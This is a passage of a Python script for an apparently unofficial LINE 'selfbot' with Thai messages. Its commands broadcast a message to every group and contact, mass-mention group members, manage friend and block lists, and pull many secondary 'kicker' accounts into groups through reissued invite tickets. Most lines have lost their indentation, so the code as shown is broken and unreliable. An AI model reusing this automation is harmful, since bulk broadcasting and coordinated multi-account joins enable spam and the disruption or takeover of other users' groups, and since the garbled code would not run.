targets = line.getGroupIdsJoined() + line.getAllContactIds()
                    for target in list(targets):  # iterate over a copy; failed targets are removed from the list below
try:
line.sendMessage(target, res)
except TalkException:
targets.remove(target)
continue
time.sleep(0.8)
                    line.sendMessage(to, 'ประกาศเรียบร้อย, จำนวน %i รายการ' % len(targets))
else:
line.sendMessage(to, parsingRes(res).format(key=setKey.title()))
elif cmd.startswith('friendlist'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cids = line.getAllContactIds()
cids.sort()
cnames = []
ress = []
res = '╭───「 Friend List 」'
res += '\n├ List:'
if cids:
contacts = []
no = 0
if len(cids) > 200:
parsed_len = len(cids)//200+1
for point in range(parsed_len):
for cid in cids[point*200:(point+1)*200]:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for cid in cids:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
else:
res += '\n│ Nothing'
res += '\n├ Usage : '
res += '\n│ • {key}FriendList'
res += '\n│ • {key}FriendList Info <num/name>'
res += '\n│ • {key}FriendList Add <mention>'
res += '\n│ • {key}FriendList Del <mention/num/name/all>'
res += '\n╰───「SelfBot ProtectV2.2」'
ress.append(res)
if cmd == 'friendlist':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('info '):
texts = textt[5:].split(', ')
if not cids:
return line.sendMessage(to, 'แสดงข้อมูลเพื่อนล้มเหลว, ไม่พบเพื่อน')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif texttl.startswith('add '):
res = '╭───「 Friend List 」'
res += '\n├ Status : Add Friend'
res += '\n├ Added :'
no = 0
added = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid in cids or mid in added:
continue
no += 1
try:
line.findAndAddContactsByMid(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
added.append(mid)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'ไม่สามารถแอดเพื่อนได้, กรุณาแทคผู้ใช้ด้วย')
elif texttl.startswith('del '):
texts = textt[4:].split(', ')
if not cids:
                        return line.sendMessage(to, 'ไม่สามารถลบเพื่อนได้, ไม่พบเพื่อนในรายการ')
res = '╭───「 Friend List 」'
res += '\n├ Status : Del Friend'
res += '\n├ Deleted :'
no = 0
deleted = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid not in cids or mid in deleted:
continue
no += 1
try:
line.deleteContact(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(mid)
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
                                if contact.mid not in cids or contact.mid in deleted:  # skip anyone who is not a friend or was already removed
continue
no += 1
try:
line.deleteContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
                                    if contact.mid not in cids or contact.mid in deleted:
continue
no += 1
try:
line.deleteContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name.lower() == 'all':
for contact in contacts:
                                        if contact.mid not in cids or contact.mid in deleted:
continue
no += 1
try:
line.deleteContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
time.sleep(0.8)
else:
                                    line.sendMessage(to, 'ไม่สามารถลบเพื่อนชื่อ `%s` ได้, ไม่พบชื่อนี้ในรายชื่อเพื่อน ♪' % name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, res)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('blocklist'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cids = line.getBlockedContactIds()
cids.sort()
cnames = []
ress = []
res = '╭───「 Block List 」'
res += '\n├ List:'
if cids:
contacts = []
no = 0
if len(cids) > 200:
parsed_len = len(cids)//200+1
for point in range(parsed_len):
for cid in cids[point*200:(point+1)*200]:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for cid in cids:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
else:
res += '\n│ Nothing'
res += '\n├ Usage : '
res += '\n│ • {key}BlockList'
res += '\n│ • {key}BlockList Info <num/name>'
res += '\n│ • {key}BlockList Add <mention>'
res += '\n│ • {key}BlockList Del <mention/num/name/all>'
res += '\n╰───「SelfBot ProtectV2.2」'
ress.append(res)
if cmd == 'blocklist':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('info '):
texts = textt[5:].split(', ')
if not cids:
return line.sendMessage(to, 'แสดงข้อมูลผู้ใช้ที่ถูกบล็อกล้มเหลว, ไม่มีผู้ใช้ในรายการ')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif texttl.startswith('add '):
res = '╭───「 Block List 」'
res += '\n├ Status : Add Block'
res += '\n├ Added :'
no = 0
added = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid in cids or mid in added:
continue
no += 1
try:
line.blockContact(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
added.append(mid)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'Failed block contact, กรุณาแทคผู้ใช้ด้วย')
elif texttl.startswith('del '):
texts = textt[4:].split(', ')
if not cids:
                        return line.sendMessage(to, 'ไม่สามารถปลดบล็อกได้, ไม่มีผู้ใช้ในรายการ')
res = '╭───「 Block List 」'
res += '\n├ Status : Del Block'
res += '\n├ Deleted :'
no = 0
deleted = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid not in cids or mid in deleted:
continue
no += 1
try:
line.unblockContact(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(mid)
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
                                if contact.mid not in cids or contact.mid in deleted:  # skip anyone who is not blocked or was already unblocked
continue
no += 1
try:
line.unblockContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
                                    if contact.mid not in cids or contact.mid in deleted:
continue
no += 1
try:
line.unblockContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name.lower() == 'all':
for contact in contacts:
                                        if contact.mid not in cids or contact.mid in deleted:
continue
no += 1
try:
line.unblockContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
time.sleep(0.8)
else:
line.sendMessage(to, 'ไม่สามารถปลดบล็อกรายชื่อนี้ได้ `%s`, ชื่อไม่อยู่ในรายการ ♪' % name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, res)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif msg.text.lower() == ".getjoined":
line.sendMessage(to,"กรุณารอสักครู่ ใจเย็นๆ")
all = line.getGroupIdsJoined()
text = ""
cnt = 0
for i in all:
text += line.getGroup(i).name + "\n" + i + "\n\n"
cnt += 1
if cnt == 10:
line.sendMessage(to,text[:-2])
text = ""
cnt = 0
                if text:  # text can be empty if the last chunk of 10 was just flushed
                    line.sendMessage(to,text[:-2])
cnt = 0
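            # kickejoinid <groupId>: pulls the protection accounts (kicker..kicker10, assumed to be
            # extra LINE client sessions logged in earlier in the script) into the given group via a
            # reissued invite ticket; Amid is assumed to be the mid of the main kicker account.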
elif "kickejoinid " in msg.text.lower():
spl = re.split("kickejoinid ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
gid = spl[1]
x = line.getGroup(gid)
if Amid not in [i.mid for i in x.members]:
if x.preventedJoinByTicket == False:
ticket = line.reissueGroupTicket(gid)
kicker.acceptGroupInvitationByTicket(gid,ticket)
kicker2.acceptGroupInvitationByTicket(gid,ticket)
kicker3.acceptGroupInvitationByTicket(gid,ticket)
kicker4.acceptGroupInvitationByTicket(gid,ticket)
kicker5.acceptGroupInvitationByTicket(gid,ticket)
kicker6.acceptGroupInvitationByTicket(gid,ticket)
kicker7.acceptGroupInvitationByTicket(gid,ticket)
kicker8.acceptGroupInvitationByTicket(gid,ticket)
kicker9.acceptGroupInvitationByTicket(gid,ticket)
kicker10.acceptGroupInvitationByTicket(gid,ticket)
else:
sirilist = [i.mid for i in x.members if any(word in i.displayName for word in ["Doctor.A","Eliza","Parry","Rakko","しりちゃん"]) or i.displayName.isdigit()]
if sirilist == []:
x.preventedJoinByTicket = False
line.updateGroup(x)
ticket = line.reissueGroupTicket(gid)
kicker.acceptGroupInvitationByTicket(gid,ticket)
kicker2.acceptGroupInvitationByTicket(gid,ticket)
kicker3.acceptGroupInvitationByTicket(gid,ticket)
kicker4.acceptGroupInvitationByTicket(gid,ticket)
kicker5.acceptGroupInvitationByTicket(gid,ticket)
kicker6.acceptGroupInvitationByTicket(gid,ticket)
kicker7.acceptGroupInvitationByTicket(gid,ticket)
kicker8.acceptGroupInvitationByTicket(gid,ticket)
kicker9.acceptGroupInvitationByTicket(gid,ticket)
kicker10.acceptGroupInvitationByTicket(gid,ticket)
kicker.sendMessage(gid,"โหมดคุ้มกันแอดมินทำงาน (`・ω・´)")
else:
line.inviteIntoGroup(gid,[Amid])
x.preventedJoinByTicket = True
line.updateGroup(x)
kicker.sendMessage(gid,"โหมดคุ้มกันแอดมินทำงาน (`・ω・´)")
else:
line.sendMessage(to,"kicker อยู่ในกลุ่มอยู่แล้ว")
elif cmd == "^^":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = line.getGroup(msg.to)
if x.preventedJoinByTicket:
x.preventedJoinByTicket = False
line.updateGroup(x)
Ticket = line.reissueGroupTicket(msg.to)
kicker.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker2.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker3.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker4.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker5.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker6.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker7.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker8.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker9.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker10.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker11.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker12.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker13.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker14.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker15.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker16.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker17.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker18.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker19.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker20.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kicker.getGroup(msg.to)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
kicker.sendMessage(msg.to,"โหมดคุ้มกันแอดมินทำงาน (`・ω・´)")
elif "kickerleave " in msg.text.lower():
spl = re.split("kickerleave ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
try:
kicker.leaveGroup(spl[1])
kicker2.leaveGroup(spl[1])
kicker3.leaveGroup(spl[1])
kicker4.leaveGroup(spl[1])
kicker5.leaveGroup(spl[1])
kicker6.leaveGroup(spl[1])
kicker7.leaveGroup(spl[1])
kicker8.leaveGroup(spl[1])
kicker9.leaveGroup(spl[1])
kicker10.leaveGroup(spl[1])
except Exception as e:
line.sendMessage(to,str(e))
#===========BOT UPDATE============#
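            # mentionall: tags group members by hand-building LINE's MENTION contentMetadata.
            # Each {"S": start, "E": end, "M": mid} entry marks where an "@name" placeholder sits in
            # the message text; mentions are flushed in chunks of 20 per message. The optional
            # <, > and = prefixes limit the tagged range to below / above / exactly a member index.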
elif msg.text.lower().startswith("mentionall"):
if msg._from in admin:
data = msg.text[len("mentionall"):].strip()
if data == "":
group = line.getGroup(msg.to)
nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
cb = ""
cb2 = ""
count = 1
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
for md in nama:
akh = akh + len(str(count)) + 2 + 5
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + len(str(count+1)) + 2 + 6
akh = akh + 1
cb2 += str(count)+". @name\n"
cnt = cnt + 1
if cnt == 20:
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
cb = ""
cb2 = ""
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
count += 1
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
elif data[0] == "<":
mentargs = int(data[1:].strip())
group = line.getGroup(msg.to)
nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
cb = ""
cb2 = ""
count = 1
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
for md in nama:
if count > mentargs:
break
akh = akh + len(str(count)) + 2 + 5
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + len(str(count+1)) + 2 + 6
akh = akh + 1
cb2 += str(count)+". @name\n"
cnt = cnt + 1
if cnt == 20:
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
cb = ""
cb2 = ""
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
count += 1
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
elif data[0] == ">":
mentargs = int(data[1:].strip())
group = line.getGroup(msg.to)
nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
cb = ""
cb2 = ""
count = 1
if mentargs >= 0:
strt = len(str(mentargs)) + 2
else:
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
for md in nama:
if count < mentargs:
count += 1
continue
akh = akh + len(str(count)) + 2 + 5
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + len(str(count+1)) + 2 + 6
akh = akh + 1
cb2 += str(count)+". @name\n"
cnt = cnt + 1
if cnt == 20:
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
cb = ""
cb2 = ""
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
count += 1
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
elif data[0] == "=":
mentargs = int(data[1:].strip())
group = line.getGroup(msg.to)
nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
cb = ""
cb2 = ""
count = 1
akh = int(0)
cnt = 0
for md in nama:
if count != mentargs:
count += 1
continue
akh = akh + len(str(count)) + 2 + 5
strt = len(str(count)) + 2
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + len(str(count+1)) + 2 + 6
akh = akh + 1
cb2 += str(count)+". @name\n"
cnt = cnt + 1
if cnt == 20:
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
cb = ""
cb2 = ""
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
count += 1
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
elif cmd == 'groupinfo':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถดูข้อมูลกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
try:
ccreator = group.creator.mid
gcreator = group.creator.displayName
except:
ccreator = None
gcreator = 'Not found'
if not group.invitee:
pendings = 0
else:
pendings = len(group.invitee)
qr = 'Close' if group.preventedJoinByTicket else 'Open'
if group.preventedJoinByTicket:
ticket = 'Not found'
else:
ticket = 'https://line.me/R/ti/g/' + str(line.reissueGroupTicket(group.id))
created = time.strftime('%d-%m-%Y %H:%M:%S', time.localtime(int(group.createdTime) / 1000))
path = 'http://dl.profile.line-cdn.net/' + group.pictureStatus
res = '╭───「 Group Info 」'
res += '\n├ ID : ' + group.id
res += '\n├ Name : ' + group.name
res += '\n├ Creator : ' + gcreator
res += '\n├ Created Time : ' + created
res += '\n├ Member Count : ' + str(len(group.members))
res += '\n├ Pending Count : ' + str(pendings)
res += '\n├ QR Status : ' + qr
res += '\n├ Ticket : ' + ticket
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendImageWithURL(to, path)
if ccreator:
line.sendContact(to, ccreator)
line.sendMessage(to, res)
elif cmd.startswith('grouplist'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
gids = line.getGroupIdsJoined()
gnames = []
ress = []
res = '╭───「 Group List 」'
res += '\n├ List:'
if gids:
groups = line.getGroups(gids)
no = 0
if len(groups) > 200:
parsed_len = len(groups)//200+1
for point in range(parsed_len):
for group in groups[point*200:(point+1)*200]:
no += 1
res += '\n│ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for group in groups:
no += 1
res += '\n│ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
else:
res += '\n│ Nothing'
res += '\n├ Usage : '
res += '\n│ • {key}GroupList'
res += '\n│ • {key}GroupList Leave <num/name/all>'
res += '\n╰───「SelfBot ProtectV2.2」'
ress.append(res)
if cmd == 'grouplist':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('leave '):
texts = textt[6:].split(', ')
leaved = []
if not gids:
                        return line.sendMessage(to, 'ไม่สามารถออกกลุ่มได้\nไม่พบชื่อกลุ่มนี้')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
if num <= len(groups) and num > 0:
group = groups[num - 1]
if group.id in leaved:
                                    line.sendMessage(to, 'ออกจากกลุ่มเรียบร้อย %s' % group.name)
continue
kicker.leaveGroup(group.id)
leaved.append(group.id)
if to not in leaved:
                                    line.sendMessage(to, 'ออกจากกลุ่มเรียบร้อย %s' % group.name)
else:
line.sendMessage(to, 'Failed leave group number %i, เลขเกิน!' % num)
elif name != None:
if name in gnames:
group = groups[gnames.index(name)]
if group.id in leaved:
                                    line.sendMessage(to, 'ออกจากกลุ่มเรียบร้อย %s' % group.name)
continue
kicker.leaveGroup(group.id)
leaved.append(group.id)
if to not in leaved:
                                    line.sendMessage(to, 'ออกจากกลุ่มเรียบร้อย %s' % group.name)
elif name.lower() == 'all':
for gid in gids:
if gid in leaved:
continue
kicker.leaveGroup(gid)
kicker2.leaveGroup(gid)
kicker3.leaveGroup(gid)
kicker4.leaveGroup(gid)
kicker5.leaveGroup(gid)
kicker6.leaveGroup(gid)
kicker7.leaveGroup(gid)
kicker8.leaveGroup(gid)
kicker9.leaveGroup(gid)
kicker10.leaveGroup(gid)
leaved.append(gid)
#time.sleep(0.8)
if to not in leaved:
line.sendMessage(to, 'ออกทุกกลุ่มเรียบร้อย ♪')
else:
line.sendMessage(to, 'ไม่สามารถออกกลุ่มชื่อ `%s`นี้ได้\nไม่พบชื่อกลุ่มนี้ ♪' % name)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('invitationlist'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
gids = line.getGroupIdsInvited()
gnames = []
ress = []
res = '╭───「 Invitation List 」'
res += '\n├ List:'
if gids:
groups = line.getGroups(gids)
no = 0
if len(groups) > 200:
parsed_len = len(groups)//200+1
for point in range(parsed_len):
for group in groups[point*200:(point+1)*200]:
no += 1
res += '\n│ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for group in groups:
no += 1
res += '\n│ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
else:
res += '\n│ Nothing'
res += '\n├ Usage : '
res += '\n│ • {key}InvitationList'
res += '\n│ • {key}InvitationList Accept <num/name/all>'
res += '\n│ • {key}InvitationList Reject <num/name/all>'
res += '\n╰───「SelfBot ProtectV2.2」'
ress.append(res)
if cmd == 'invitationlist':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('accept '):
texts = textt[7:].split(', ')
accepted = []
if not gids:
return line.sendMessage(to, 'ไม่สามารถเข้าร่วมกลุ่มได้\nไม่มีคำเชิญเข้ากลุ่ม')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
if num <= len(groups) and num > 0:
group = groups[num - 1]
if group.id in accepted:
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
continue
line.acceptGroupInvitation(group.id)
accepted.append(group.id)
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
else:
                                line.sendMessage(to, 'ไม่สามารถเข้าร่วมกลุ่มได้ เนื่องจากหมายเลข %i นี้มากกว่าคำเชิญที่คุณมี' % num)
elif name != None:
if name in gnames:
group = groups[gnames.index(name)]
if group.id in accepted:
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
continue
line.acceptGroupInvitation(group.id)
accepted.append(group.id)
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
elif name.lower() == 'all':
for gid in gids:
if gid in accepted:
continue
line.acceptGroupInvitation(gid)
accepted.append(gid)
time.sleep(0.8)
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่มทั้งหมดแล้ว ♪')
else:
line.sendMessage(to, 'ไม่สามารถเข้าร่วมกลุ่มได้ `%s`, ไม่พบชื่อกลุ่มนี้ ♪' % name)
elif texttl.startswith('reject '):
texts = textt[7:].split(', ')
rejected = []
if not gids:
                        return line.sendMessage(to, 'ไม่สามารถยกเลิกคำเชิญเข้าร่วมกลุ่มได้\nไม่มีคำเชิญเข้าร่วมกลุ่ม')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
if num <= len(groups) and num > 0:
group = groups[num - 1]
if group.id in rejected:
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
continue
line.rejectGroupInvitation(group.id)
rejected.append(group.id)
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
else:
                                line.sendMessage(to, 'ไม่สามารถยกเลิกค้างเชิญหมายเลข %i นี้ได้เนื่องจากเลขเกิน!' % num)
elif name != None:
if name in gnames:
group = groups[gnames.index(name)]
if group.id in rejected:
